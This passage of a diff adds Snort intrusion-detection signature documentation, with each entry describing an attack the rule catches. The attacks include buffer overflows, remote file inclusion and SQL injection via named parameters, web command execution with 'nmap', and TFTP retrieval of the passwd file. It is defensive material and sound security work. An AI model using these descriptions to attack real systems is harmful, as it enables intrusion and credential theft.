+More information on this event can be found in the individual
+pre-processor documentation README.asn1 in the docs directory of the
+snort source. Detailed instructions and examples on how to tune and use
+the pre-processor can also be found in the same document.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ASN1 Information Site:
+http://asn1.elibel.tm.fr/
+
+--
--- /dev/null
+++ b/doc/signatures/1904.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1904
+
+--
+Summary:
+This event is generated when a remote attacker sends an IMAP FIND
+command with a malformed argument to an internal IMAP server. This may
+indicate an attempt to exploit a buffer overflow vulnerability in the
+IMAP FIND command.
+
+--
+Impact:
+Possible shell access on the IMAP server, leading to arbitrary code
+execution. The attacker must have a valid IMAP account on the mail
+server to attempt this exploit.
+
+--
+Detailed Information:
+When a FIND command with a malformed and overly long argument is sent to
+a vulnerable IMAP server, a buffer overflow condition may occur. This
+can allow an attacker to execute arbitrary code from the command shell.
+Note that this exploit can only be attempted by a user with a valid IMAP
+account.
+
+--
+Affected Systems:
+	University of Washington imapd versions 10.234 or 12.264.
+
+--
+Attack Scenarios:
+An attacker with an IMAP account on the server can send a malformed and
+sufficiently long FIND command to the IMAP server, creating a buffer
+overflow condition. This can then allow the attacker to execute
+arbitrary shell code on the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the user must have a valid IMAP account on
+the server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the patch for your current version of imapd appropriate to your
+operating system.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1425.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1425
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2715.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2715
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_load
+. This procedure is included in
+dbms_offline_snapshot.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/563.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+563
+
+--
+Summary:
+This event is generated when a known response to a sucessful attack is
+detected.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when a known response to a sucessful attack is
+detected. Some applications do not perform stringent checks when validating
+the credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can be
+compromised and trust relationships between the victim server and other
+hosts can be exploited by the attacker.
+
+Events generated by rules in attack-responses.rules may indicate that an
+attack against a host has been sucessful.
+
+--
+Affected Systems:
+	Any vulnerable host.
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. An attacker might also exploit a
+weakness in a particular application or piece of software that will
+present the opportunity to gain access to the host.
+
+--
+Ease of Attack:
+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
--- /dev/null
+++ b/doc/signatures/483.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+483
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running CyberKit 2.2 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running CyberKit 2.2 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS154
+
+--
--- /dev/null
+++ b/doc/signatures/615.txt
@@ -0,0 +1,94 @@
+Rule:  
+
+--
+
+Sid:
+
+615
+
+--
+
+Summary:
+
+An external host has requested to start communications with your host on
+port 1080.
+
+--
+
+Impact:
+
+Network reconnaissance.
+
+--
+
+Detailed Information:
+
+Improperly-configured SOCKS proxies can be abused to allow a hostile
+user to launch attacks and make them appear to come from your site.
+
+Additionally, if the proxy is behind a firewall or is a trusted host, it
+can be used to gain further access into your network and other hosts.
+
+--
+
+Affected Systems:
+
+Any system with a SOCKS proxy server installed.
+
+--
+
+Attack Scenarios:
+
+Attacker utilizes your misconfigured proxy to anonymize their other
+illegitimate activities or gain further access to your network.
+
+--
+
+Ease of Attack:
+
+Trivial or extremely difficult, depending on proxy configuration.
+
+--
+
+False Positives:
+Non-proxy applications running on port 1080, regardless of purpose, will
+trigger this alert every time any session begins.
+
+Ftp clients open a source tcp port greater than 1023 (an 'ephemeral' port).  If the 
+client opens port 1080 for the data connection, this rule will be triggered by return
+packets from the ftp server.  One way to cut down on these false
+positives for this rule might be to preceed it with a pass rule for
+'established' connections to 1080. This would only work with passive ftp
+transactions, where the client initiates both control and data sessions. Normal ftp 
+requires the server to initiate a connection to the client for data transfers after the client 
+sets up a control session.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Allow only internal users to connect to the proxy, or configure strong
+access control.
+
+--
+
+Contributors:
+Snort documentation contributed by Gene R Gomez (gene!AT!gomezbrothers!DOT!com)
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by jaffeld@duwamish.net
+
+-- 
+
+Additional References:
+
+UnderNet:
+http://help.undernet.org/proxyscan/
+
+
+--
--- /dev/null
+++ b/doc/signatures/1219.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1219
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2809.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2809
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure unregister_mview_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3173.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3173
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2191.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2191
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+--
--- /dev/null
+++ b/doc/signatures/3111.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3111
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2407.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2407
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering  and system integrity compromise. This rule generates 
+an event on a request for the util.pl file, part of the CalaCode @mail 
+Webmail system.  Some versions of this software are vulnerable to a cross 
+site scripting attack.
+
+--
+Detailed Information:
+When accessing the webmail service of @mail, a
+cross site scripting bug can be abused in the util.pl file.  When
+addressing the "settings" bar, Javascript code can be inserted into the
+"Displayed Name" field.
+
+This rule will also trigger on some scripted HTTP vulnerability
+scans.  Many vulnerability assessment tools include a check which will
+verify whether the util.pl file is available on a web server.  There are
+multiple other known vulnerabilities in version 3.64 of the @mail system,
+and the existance of this file would reveal its presence.
+
+--
+Affected Systems:
+	@mail version 3.64 and prior
+
+--
+Attack Scenarios:
+A user can submit malicious Javascript to the "Displayed
+Name" field.  As usual with most browsers, this script will be executed
+within the security context of the web site.  The session ID of the
+connection, which is available from within this security context, can be
+abused by the attacker to obtain access to the session and the user's e-mail account.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck, GCIA <maarten@daemon.be>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000851.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000851
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "IceWarp" application running on a webserver. Access to the file "include.php" using a remote file being passed as the "language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "language" parameter in the "include.php" script used by the "IceWarp" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using IceWarp
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/380.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+380
+
+Summary:
+This event is generated when an ICMP echo request is made from a Windows host running "Seer" software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a Windows host running "Seer" software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS166
+
+--
--- /dev/null
+++ b/doc/signatures/1361.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+1361
+
+-- 
+Summary:
+A web command execution attack involving the use of a
+"nmap" command
+
+-- 
+Impact: 
+Possible intelligence gathering activity.
+
+-- 
+Detailed Information: 
+The attacker may have gained the ability to execute system commands remotely or the web server may be incorrectly configured to allow such access.
+
+This rule generates an event when a "nmap" command is used over a plain-text (unencrypted) connection on one of the specified web ports to the target web server. The "nmap" command may be used to discover open ports, services and operating system information on hosts.
+
+The rule looks for the "nmap" command in the client to web server network traffic and does not indicate whether the command was actually successful. The presence of the "nmap" command in the URI indicates that an attacker attempted to trick the web server into executing system in non-interactive mode i.e. without a valid shell session.
+
+Alternatively this rule may generate an event in an unencrypted HTTP tunneling connection to the server or a shell connection via another exploit against the web server.
+
+-- 
+Attack Scenarios: 
+An attacker uses a "nmap" command to probe other hosts for further exploitation.
+
+--
+Ease of Attack: 
+Simple. No exploit software required
+
+-- 
+False Positives: 
+Any string containing 'nmap' followed by space in the URL will trigger the alarm.
+
+--
+False Negatives: 
+none known
+
+-- 
+Corrective Action: 
+Check the web server software for vulnerabilities and possible upgrades or patches for the system to the latest version of the web software, also investigate the server logs for signs of compromise
+
+Webservers should not be allowed to view or execute files and binaries outside of it's designated web root or cgi-bin. Disallowing execution of this binary via a URI is suggested.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000859.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000859
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "hidemail" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "hidemail" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000766.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000766
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Blog CMS" application running on a webserver. Access to the file "thumb.php" using a remote file being passed as the "gallery" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "gallery" parameter in the "thumb.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1443.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1443
+
+--
+Summary:
+This event is generated when a TFTP GET request is made for the "passwd"
+file.  This could be an indication that a remote attacker has 
+compromised a system on the network and is transfering sensitive files 
+back to the attacking system.  It may also be an indication of a generic
+TFTP server scan that includes tests for generic system files.
+
+--
+Impact:
+The "passwd" file normally stores users names for Unix based systems.  
+If this file is being transfered over the network using TFTP it is 
+normally an indication of a system compromise.
+
+In some situations this rule may only indicate a generic TFTP scan 
+attempt, as the attacker may be scanning a large range of IP addresses 
+for TFTP improperly configured TFTP servers.
+
+--
+Detailed Information:
+This rule searches for the filename "passwd" in TFTP GET requests.  The 
+"passwd" file is used by Unix based systems to store users names for the
+system.
+
+--
+Attack Scenarios:
+After a successful system compromise an attacker may setup a tftp 
+service to transfer files back to the attacking system.  Under this 
+scenario the source address will point to the attack network and the 
+destination address will be an address defined in the HOME_NET.
+
+Attackers may also scan large subnets for TFTP servers and make numerous
+generic GET request for common system files. 
+
+--
+Ease of Attack:
+Simple: Numerous tools and automated scripts exist for scanning large 
+subnets for improperly configured TFTP servers.
+
+--
+False Positives:
+This rule was created to catch TFTP GET requests for "passwd", if this 
+file name is being used during a legitimate TFTP session this rule will 
+generate a false positive.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Depending on the situation blocking the attacker at the upstream router 
+or firewall will eliminate the problem.  However, if the TFTP server is 
+incorrectly configured and is actually serving the "passwd" file, it 
+should be configured to only serve specific files from a safe directory.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+--
+Additional References
+
+--
--- /dev/null
+++ b/doc/signatures/804.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+804
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability in SWSoft ASPSeek search engine software.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+SWSoft ASPSeek search engine software contains a buffer overflow 
+vulnerability where, if a sufficiently long string is sent to the s.cgi 
+script using the template (tmpl) variable, a buffer overflow condition 
+can occur. This may allow the execution of arbitrary code. 
+
+--
+Affected Systems:
+All Apache web servers running SWSoft ASPSeek 1.0.3 and earlier are 
+vulnerable.
+
+--
+Attack Scenarios:
+An attacker can send a crafted query to the s.cgi script, creating a 
+buffer overflow condition. This could then allow the attacker to execute
+arbitrary code from the system's command shell.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses s.cgi where the "tmpl" variable is 
+invoked, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to SWSoft ASPSeek 1.04 or later.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2492
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0476
+
+--
--- /dev/null
+++ b/doc/signatures/3055.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3055
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
